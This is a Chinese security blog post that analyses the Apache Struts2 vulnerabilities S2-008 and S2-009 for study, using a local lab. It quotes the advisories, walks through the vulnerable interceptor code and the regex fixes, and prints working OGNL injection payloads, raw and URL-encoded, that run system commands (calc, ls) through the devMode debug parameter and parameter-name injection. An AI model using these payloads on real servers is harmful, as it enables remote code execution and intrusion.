<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content>
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
          【Struts2-命令-代码执行漏洞分析系列】 S2-008 &amp; S2-009 - Kingkk&#39;s Blog
        
    </title>

    <link rel="canonical" href="https://www.kingkk/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/">

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/hux-blog.min.css">

    <!-- Pygments Highlight CSS -->
    <link rel="stylesheet" href="/css/highlight.css">

    <!-- Custom Fonts -->
    <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
    <!-- Hux change font-awesome CDN to qiniu -->
    <link href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">


    <!-- Hux Delete, sad but pending in China
    <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/
    css'>
    -->


    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- ga & ba script hoook -->
    <script></script>
</head>


<!-- hack iOS CSS :active style -->
<body ontouchstart="">

    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Kingkk&#39;s Blog</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>

                    

                        
                    

                        
                        <li>
                            <a href="/about/">About</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/archives/">Archives</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/tags/">Tags</a>
                        </li>
                        
                    
                    
                </ul>
            </div>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>


    <!-- Main Content -->
    
<!-- Image to hack wechat -->
<!-- <img src="https://www.kingkk/img/icon_wechat.png" width="0" height="0"> -->
<!-- <img src="{{ site.baseurl }}/{% if page.header-img %}{{ page.header-img }}{% else %}{{ site.header-img }}{% endif %}" width="0" height="0"> -->

<!-- Post Header -->
<style type="text/css">
    header.intro-header{
        background-image: url('/img/home-bg.jpg')
    }
</style>
<header class="intro-header" >
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <div class="tags">
                        
                          <a class="tag" href="/tags/#java" title="java">java</a>
                        
                          <a class="tag" href="/tags/#漏洞分析" title="漏洞分析">漏洞分析</a>
                        
                          <a class="tag" href="/tags/#struts2" title="struts2">struts2</a>
                        
                    </div>
                    <h1>【Struts2-命令-代码执行漏洞分析系列】 S2-008 &amp; S2-009</h1>
                    <h2 class="subheading"></h2>
                    <span class="meta">
                        Posted by kingkk on
                        2018-09-01
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

    <!-- Post Container -->
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                post-container">

                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这两篇漏洞分析总感觉有些不尽人意的地方，可能也是因为太菜了吧。漏洞环境改自vulhub <a href="https://github.com/kingkaki/Struts2-Vulenv" target="_blank" rel="noopener">https://github.com/kingkaki/Struts2-Vulenv</a></p>
<h1 id="S2-008"><a href="#S2-008" class="headerlink" title="S2-008"></a>S2-008</h1><h2 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h2><p><a href="https://cwiki.apache.org/confluence/display/WW/S2-008" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-008</a></p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/1.png" alt></p>
<p>主要是利用对传入参数没有严格限制，导致多个地方可以执行恶意代码</p>
<blockquote>
<ol>
<li><strong>Remote command execution in Struts &lt;= 2.2.1.1 (ExceptionDelegator)</strong><br>When an exception occurs while applying parameter values to properties, the value is evaluated as an OGNL expression. For example, this occurs when setting a string value to an integer property. Since the values are not filtered an attacker can abuse the power of the OGNL language to execute arbitrary Java code leading to remote command execution. This issue has been reported (<a href="https://issues.apache.org/jira/browse/WW-3668" target="_blank" rel="noopener">https://issues.apache.org/jira/browse/WW-3668</a>) and was fixed in Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked.</li>
<li><strong>Remote command execution in Struts &lt;= 2.3.1 (CookieInterceptor)</strong><br>The character whitelist for parameter names is not applied to the <code>CookieInterceptor</code>. When Struts is configured to handle cookie names, an attacker can execute arbitrary system commands with static method access to Java functions. Therefore the flag <code>allowStaticMethodAccess</code> can be set to true within the request.</li>
<li><strong>Arbitrary File Overwrite in Struts &lt;= 2.3.1 (ParameterInterceptor)</strong><br>While accessing the flag <code>allowStaticMethodAccess</code> within parameters is prohibited since Struts 2.2.3.1 an attacker can still access public constructors with only one parameter of type String to create new Java objects and access their setters with only one parameter of type String. This can be abused in example to create and overwrite arbitrary files. To inject forbidden characters into a filename an uninitialized string property can be used.</li>
<li><strong>Remote command execution in Struts &lt;= 2.3.1 (DebuggingInterceptor)</strong><br>While not being a security vulnerability itself, please note that applications running in developer mode and using the <code>DebuggingInterceptor</code> are prone to remote command execution as well. While applications should never run in developer mode during production, developers should be aware that doing so not only has performance issues (as documented) but also a critical security impact.</li>
</ol>
</blockquote>
<p>第一种情况其实就是S2-007，在异常处理时的OGNL执行</p>
<p>第二种的cookie的方式，虽然在struts2没有对恶意代码进行限制，但是java的webserver（Tomcat），对cookie的名称有较多限制，在传入struts2之前就被处理，从而较为鸡肋</p>
<p>第四种需要开启<code>devMode</code>debug模式</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>这里复现采用的是第四种<code>devMode</code>的debug模式，造成的任意代码执行</p>
<p>过程也比较简单，在struts.xml中配置了如下xml语句，就可以开启debug模式</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">constant</span> <span class="attr">name</span>=<span class="string">"struts.devMode"</span> <span class="attr">value</span>=<span class="string">"true"</span> /&gt;</span></span><br></pre></td></tr></table></figure>
<p>然后传入<code>?debug=command&amp;expression=&lt;OGNL EXP&gt;</code>即可执行OGNL表达式</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">http</span>://localhost:8888/devmode.action?debug=command&amp;expression=<span class="number">%28</span><span class="number">%23</span>application<span class="number">%29</span></span><br></pre></td></tr></table></figure>
<p>就可以看到应用的相关信息</p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/2.png" alt></p>
<p>然后按照惯例弹个计算器，payload</p>
<figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(#_memberAccess[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="literal">#f</span>oo=new java.lang.Boolean(<span class="string">"false"</span>) ,#context[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=<span class="literal">#f</span>oo,@org.apache.commons.io.IOUtils@toString(<span class="name">@java.lang.Runtime@getRuntime</span>().exec(<span class="symbol">'calc</span>').getInputStream()))</span><br></pre></td></tr></table></figure>
<p>传入前记得编码</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">%28</span><span class="symbol">%23</span>_memberAccess<span class="symbol">%5</span>B<span class="symbol">%22</span>allowStaticMethodAccess<span class="symbol">%22</span><span class="symbol">%5</span>D<span class="symbol">%3</span>Dtrue<span class="symbol">%2</span>C<span class="symbol">%23</span>foo<span class="symbol">%3</span>Dnew<span class="symbol">%20</span>java.lang.Boolean<span class="symbol">%28</span><span class="symbol">%22</span><span class="keyword">false</span><span class="symbol">%22</span><span class="symbol">%29</span><span class="symbol">%20</span><span class="symbol">%2</span>C<span class="symbol">%23</span>context<span class="symbol">%5</span>B<span class="symbol">%22</span>xwork.MethodAccessor.denyMethodExecution<span class="symbol">%22</span><span class="symbol">%5</span>D<span class="symbol">%3</span>D<span class="symbol">%23</span>foo<span class="symbol">%2</span>C<span class="title">@org.apache.commons.io.IOUtils</span><span class="title">@toString</span><span class="symbol">%28</span><span class="title">@java.lang.Runtime</span><span class="title">@getRuntime</span><span class="symbol">%28</span><span class="symbol">%29</span>.exec<span class="symbol">%28</span><span class="symbol">%27</span>calc<span class="symbol">%27</span><span class="symbol">%29</span>.getInputStream<span class="symbol">%28</span><span class="symbol">%29</span><span class="symbol">%29</span><span class="symbol">%29</span></span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/3.png" alt></p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>感觉没有什么太多好分析的，触发地址</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">S2-<span class="number">0</span>08/web/WEB-INF/<span class="class"><span class="keyword">lib</span>/<span class="title">struts2</span>-<span class="title">core</span>-2.2.3.<span class="title">jar!</span>/<span class="title">org</span>/<span class="title">apache</span>/<span class="title">struts2</span>/<span class="title">interceptor</span>/<span class="title">debugging</span>/<span class="title">DebuggingInterceptor</span>.<span class="title">class</span>:87</span></span><br></pre></td></tr></table></figure>
<p>代码比较多，而且比较多的部分都是无用的代码，就简化了下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">intercept</span><span class="params">(ActionInvocation inv)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">    <span class="keyword">boolean</span> actionOnly = <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">boolean</span> cont = <span class="keyword">true</span>;</span><br><span class="line">    Boolean devModeOverride = FilterDispatcher.getDevModeOverride();</span><br><span class="line">    <span class="keyword">boolean</span> devMode = devModeOverride != <span class="keyword">null</span> ? devModeOverride : <span class="keyword">this</span>.devMode;</span><br><span class="line">    <span class="keyword">final</span> ActionContext ctx;</span><br><span class="line">    <span class="keyword">if</span> (devMode) &#123;</span><br><span class="line">        ctx = ActionContext.getContext();</span><br><span class="line">        String type = <span class="keyword">this</span>.getParameter(<span class="string">"debug"</span>);</span><br><span class="line">        ctx.getParameters().remove(<span class="string">"debug"</span>);</span><br><span class="line">        <span class="keyword">if</span> (<span class="string">"xml"</span>.equals(type)) &#123;</span><br><span class="line">			....</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="string">"console"</span>.equals(type)) &#123;</span><br><span class="line">			....</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="string">"command"</span>.equals(type)) &#123;</span><br><span class="line">            ValueStack stack = (ValueStack)ctx.getSession().get(<span class="string">"org.apache.struts2.interceptor.debugging.VALUE_STACK"</span>);</span><br><span class="line">            <span class="keyword">if</span> (stack == <span class="keyword">null</span>) &#123;</span><br><span class="line">                stack = (ValueStack)ctx.get(<span class="string">"com.opensymphony.xwork2.util.ValueStack.ValueStack"</span>);</span><br><span class="line">                ctx.getSession().put(<span class="string">"org.apache.struts2.interceptor.debugging.VALUE_STACK"</span>, stack);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            String cmd = <span class="keyword">this</span>.getParameter(<span class="string">"expression"</span>);</span><br><span class="line">            ServletActionContext.getRequest().setAttribute(<span class="string">"decorator"</span>, <span class="string">"none"</span>);</span><br><span class="line">            HttpServletResponse res = ServletActionContext.getResponse();</span><br><span class="line">            res.setContentType(<span class="string">"text/plain"</span>);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                PrintWriter writer = ServletActionContext.getResponse().getWriter();</span><br><span class="line">                writer.print(stack.findValue(cmd));</span><br><span class="line">                writer.close();</span><br><span class="line">            &#125; <span class="keyword">catch</span> (IOException var17) &#123;</span><br><span class="line">                var17.printStackTrace();</span><br><span class="line">            &#125;</span><br><span class="line">            .....</span><br></pre></td></tr></table></figure>
<p>一开始取出get中的<code>debug</code>参数的值，然后进入if语句</p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/4.png" alt></p>
<p>当值等于<code>command</code>时，取出<code>expression</code>的值赋值给cmd</p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/5.png" alt></p>
<p>通过<code>statck.findValue</code>即可执行OGNL表达式，造成代码执行</p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>主要是加强了对于参数的正则匹配<code>ParametersInterceptor.class</code>（左边为修补后的，右边为有漏洞的版本）</p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/6.png" alt></p>
<p>在<code>CookieInterceptor.class</code>中也做了限制</p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/7.png" alt></p>
<h1 id="S2-009"><a href="#S2-009" class="headerlink" title="S2-009"></a>S2-009</h1><h2 id="漏洞信息-1"><a href="#漏洞信息-1" class="headerlink" title="漏洞信息"></a>漏洞信息</h2><p><a href="https://cwiki.apache.org/confluence/display/WW/S2-009" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-009</a></p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/8.png" alt></p>
<blockquote>
<p>OGNL provides, among other features, extensive expression evaluation capabilities. The vulnerability allows a malicious user to bypass all the protections (regex pattern, deny method invocation) built into the ParametersInterceptor, thus being able to inject a malicious expression in any exposed string variable for further evaluation.</p>
<p>A similar behavior was already addressed in S2-003 and S2-005, but it turned out that the resulting fix based on whitelisting acceptable parameter names closed the vulnerability only partially.<br>Regular expression in ParametersInterceptor matches top[‘foo’](0) as a valid expression, which OGNL treats as (top[‘foo’])(0) and evaluates the value of ‘foo’ action parameter as an OGNL expression. This lets malicious users put arbitrary OGNL statements into any String variable exposed by an action and have it evaluated as an OGNL expression and since OGNL statement is in HTTP parameter value attacker can use blacklisted characters (e.g. #) to disable method execution and execute arbitrary methods, bypassing the ParametersInterceptor and OGNL library protections.</p>
</blockquote>
<p>在修补了S2-003和S2-005之后，攻击者又发现了一种新的绕过<code>ParametersInterceptor</code>正则保护的攻击方式</p>
<p>当传入<code>(ONGL)(1)</code>时，会将前者视为ONGL表达式来执行，从而绕过了正则的匹配保护。而且由于其在HTTP参数值中，也可以进一步绕过字符串限制的保护</p>
<h2 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>这回是直接利用官方的<code>showcase</code>war包来演示漏洞利用</p>
<p>触发地址<code>/ajax/example5.action</code></p>
<p>在网上找了个有回显的payload</p>
<figure class="highlight smalltalk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">age=<span class="number">12313</span>&amp;name=(<span class="symbol">#context</span>[<span class="comment">"xwork.MethodAccessor.denyMethodExecution"</span>]=+new+java.lang.<span class="type">Boolean</span>(<span class="keyword">false</span>),+<span class="symbol">#_memberAccess</span>[<span class="comment">"allowStaticMethodAccess"</span>]=<span class="keyword">true</span>,+<span class="symbol">#a</span>=@java.lang.<span class="type">Runtime</span>@getRuntime().exec(<span class="string">'ls'</span>).getInputStream(),<span class="symbol">#b</span>=new+java.io.<span class="type">InputStreamReader</span>(<span class="symbol">#a</span>),<span class="symbol">#c</span>=new+java.io.<span class="type">BufferedReader</span>(<span class="symbol">#b</span>),<span class="symbol">#d</span>=new+char[<span class="number">51020</span>],<span class="symbol">#c</span>.read(<span class="symbol">#d</span>),<span class="symbol">#kxlzx</span>=@org.apache.struts2.<span class="type">ServletActionContext</span>@getResponse().getWriter(),<span class="symbol">#kxlzx</span>.println(<span class="symbol">#d</span>),<span class="symbol">#kxlzx</span>.close())(meh)&amp;z[(name)(<span class="string">'meh'</span>)]</span><br></pre></td></tr></table></figure>
<p>编码后完整的url</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">192.168</span>.<span class="number">85.133</span>:<span class="number">8080</span>/ajax/example<span class="number">5</span>.action?age=<span class="number">12313</span>&amp;name=(<span class="symbol">%23</span>context[<span class="symbol">%22</span>xwork.MethodAccessor.denyMethodExecution<span class="symbol">%22</span>]=+new+java.lang.Boolean(<span class="keyword">false</span>),+<span class="symbol">%23</span>_memberAccess[<span class="symbol">%22</span>allowStaticMethodAccess<span class="symbol">%22</span>]=<span class="keyword">true</span>,+<span class="symbol">%23</span>a=<span class="title">@java.lang.Runtime</span><span class="title">@getRuntime</span>().exec(<span class="symbol">%27</span>ls<span class="symbol">%27</span>).getInputStream(),<span class="symbol">%23</span>b=new+java.io.InputStreamReader(<span class="symbol">%23</span>a),<span class="symbol">%23</span><span class="keyword">c</span>=new+java.io.BufferedReader(<span class="symbol">%23</span>b),<span class="symbol">%23</span>d=new+char[<span class="number">51020</span>],<span class="symbol">%23</span><span class="keyword">c</span>.read(<span class="symbol">%23</span>d),<span class="symbol">%23</span>kxlzx=<span class="title">@org.apache.struts2.ServletActionContext</span><span class="title">@getResponse</span>().getWriter(),<span class="symbol">%23</span>kxlzx.println(<span class="symbol">%23</span>d),<span class="symbol">%23</span>kxlzx.close())(meh)&amp;z[(name)(<span class="symbol">%27</span>meh<span class="symbol">%27</span>)]</span><br></pre></td></tr></table></figure>
<p>网页访问会返回一个文件下载，这里直接用burp会方便点，可以直接看</p>
<p><img src="https://raw.githubusercontent.com/kingkaki/cloud-img/master/blog-archive/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/9.png" alt></p>
<h2 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>感觉这回的没什么好分析的，还是之前提的</p>
<blockquote>
<p>当传入<code>(ONGL)(1)</code>时，会将前者视为ONGL表达式来执行，从而绕过了正则的匹配保护。而且由于其在HTTP参数值中，也可以进一步绕过字符串限制的保护</p>
</blockquote>
<p>主要还是参数过滤的问题，可以配合漏洞修复一起看看</p>
<h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>在参数拦截器中，将接受参数的正则进行了升级</p>
<p>struts2.3.1.1：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">private String acceptedParamNames = <span class="string">"[a-zA-Z0-9<span class="subst">\\</span>.<span class="subst">\\</span>]<span class="subst">\\</span>[<span class="subst">\\</span>(<span class="subst">\\</span>)_']+"</span>;</span><br></pre></td></tr></table></figure>
<p>struts2.3.1.2：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">private String acceptedParamNames = <span class="string">"<span class="subst">\\</span>w+((<span class="subst">\\</span>.<span class="subst">\\</span>w+)|(<span class="subst">\\</span>[<span class="subst">\\</span>d+<span class="subst">\\</span>])|(<span class="subst">\\</span>(<span class="subst">\\</span>d+<span class="subst">\\</span>))|(<span class="subst">\\</span>['<span class="subst">\\</span>w+'<span class="subst">\\</span>])|(<span class="subst">\\</span>('<span class="subst">\\</span>w+'<span class="subst">\\</span>)))*"</span>;</span><br></pre></td></tr></table></figure>
<p>从而防御了<code>(ONGL)(1)</code>形式的攻击</p>
<h1 id="Reference-Links"><a href="#Reference-Links" class="headerlink" title="Reference Links"></a>Reference Links</h1><p><a href="http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities/#S2-008" target="_blank" rel="noopener">http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities/#S2-008</a></p>
<p><a href="https://www.jianshu.com/p/68bf5ca2d61f" target="_blank" rel="noopener">https://www.jianshu.com/p/68bf5ca2d61f</a></p>
<p><a href="https://github.com/vulhub" target="_blank" rel="noopener">https://github.com/vulhub</a></p>


                <hr>

                

                <ul class="pager">
                    
                        <li class="previous">
                            <a href="/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-012/" data-toggle="tooltip" data-placement="top" title="【Struts2-命令-代码执行漏洞分析系列】S2-012">&larr; Previous Post</a>
                        </li>
                    
                    
                        <li class="next">
                            <a href="/2018/08/Struts2-命令-代码执行漏洞分析系列 S2-007/" data-toggle="tooltip" data-placement="top" title="【Struts2-命令-代码执行漏洞分析系列】S2-007">Next Post &rarr;</a>
                        </li>
                    
                </ul>

                

                

            </div>
    <!-- Side Catalog Container -->
        

    <!-- Sidebar Container -->

            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                
                <section>
                    <!-- no hr -->
                    <h5><a href="/tags/">FEATURED TAGS</a></h5>
                    <div class="tags">
                       
                          <a class="tag" href="/tags/#java" title="java">java</a>
                        
                          <a class="tag" href="/tags/#漏洞分析" title="漏洞分析">漏洞分析</a>
                        
                          <a class="tag" href="/tags/#struts2" title="struts2">struts2</a>
                        
                    </div>
                </section>
                

                <!-- Friends Blog -->
                
                <hr>
                <h5>FRIENDS</h5>
                <ul class="list-inline">

                    
                        <li><a href="//98587329.github.io" target="_blank">mt</a></li>
                    
                        <li><a href="//www.cflowerth.com" target="_blank">FAtwAER</a></li>
                    
                        <li><a href="//lufe1.cn" target="_blank">lufei</a></li>
                    
                        <li><a href="//0x3f97.github.io" target="_blank">gd</a></li>
                    
                        <li><a href="http://www.lsafe.org" target="_blank">4dmin$5</a></li>
                    
                        <li><a href="http://www.thekingofnight.com/" target="_blank">theKingOfNight</a></li>
                    
                        <li><a href="http://www.thekingofnight.com/" target="_blank">Hpdoger</a></li>
                    
                        <li><a href="//mochazz.github.io/" target="_blank">七月火</a></li>
                    
                        <li><a href="https://mengsec.com/" target="_blank">蒙尘</a></li>
                    
                        <li><a href="https://patrilic.top/" target="_blank">Patrilic&#39;s Blog</a></li>
                    
                </ul>
                
            </div>

        </div>
    </div>
</article>







<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script>
    async("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js",function(){
        anchors.options = {
          visible: 'always',
          placement: 'right',
          icon: '#'
        };
        anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
    })
</script>
<style>
    /* place left on bigger screen */
    @media all and (min-width: 800px) {
        .anchorjs-link{
            position: absolute;
            left: -0.75em;
            font-size: 1.1em;
            margin-top : -0.1em;
        }
    }
</style>



    <!-- Footer -->
    <!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                
                
                

                

                

                
                    <li>
                        <a target="_blank"  href="https://github.com/kingkaki">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; Kingkk&#39;s Blog 2019 
                    <br>
                    Theme by <a href="http://huangxuan.me">Hux</a> 
                    <span style="display: inline-block; margin: 0 5px;">
                        <i class="fa fa-heart"></i>
                    </span> 
                    Ported by <a href="http://blog.kaijun.rocks">Kaijun</a> <!-- | 
                    <iframe
                        style="margin-left: 2px; margin-bottom:-5px;"
                        frameborder="0" scrolling="0" width="91px" height="20px"
                        src="https://ghbtns.com/github-btn.html?user=kaijun&repo=hexo-theme-huxblog&type=star&count=true" >
                    </iframe>
                    -->
                </p>
            </div>
        </div>
    </div>
</footer>

<!-- jQuery -->
<script src="/js/jquery.min.js"></script>

<!-- Bootstrap Core JavaScript -->
<script src="/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script src="/js/hux-blog.min.js"></script>


<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>

<!-- 
     Because of the native support for backtick-style fenced code blocks 
     right within the Markdown is landed in Github Pages, 
     From V1.6, There is no need for Highlight.js, 
     so Huxblog drops it officially.

     - https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0  
     - https://help.github.com/articles/creating-and-highlighting-code-blocks/    
-->
<!--
    <script>
        async("http://cdn.bootcss.com/highlight.js/8.6/highlight.min.js", function(){
            hljs.initHighlightingOnLoad();
        })
    </script>
    <link href="http://cdn.bootcss.com/highlight.js/8.6/styles/github.min.css" rel="stylesheet">
-->


<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("https://www.kingkk/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>


<!-- Google Analytics -->




<!-- Baidu Tongji -->

<script>
    // dynamic User by Hux
    var _baId = '2095437387a20021fd7e176e0c1aac8b';

    // Originial
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?" + _baId;
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
</script>


<!-- Side Catalog -->





<!-- Image to hack wechat -->
<img src="https://www.kingkk/img/icon_wechat.png" width="0" height="0" />
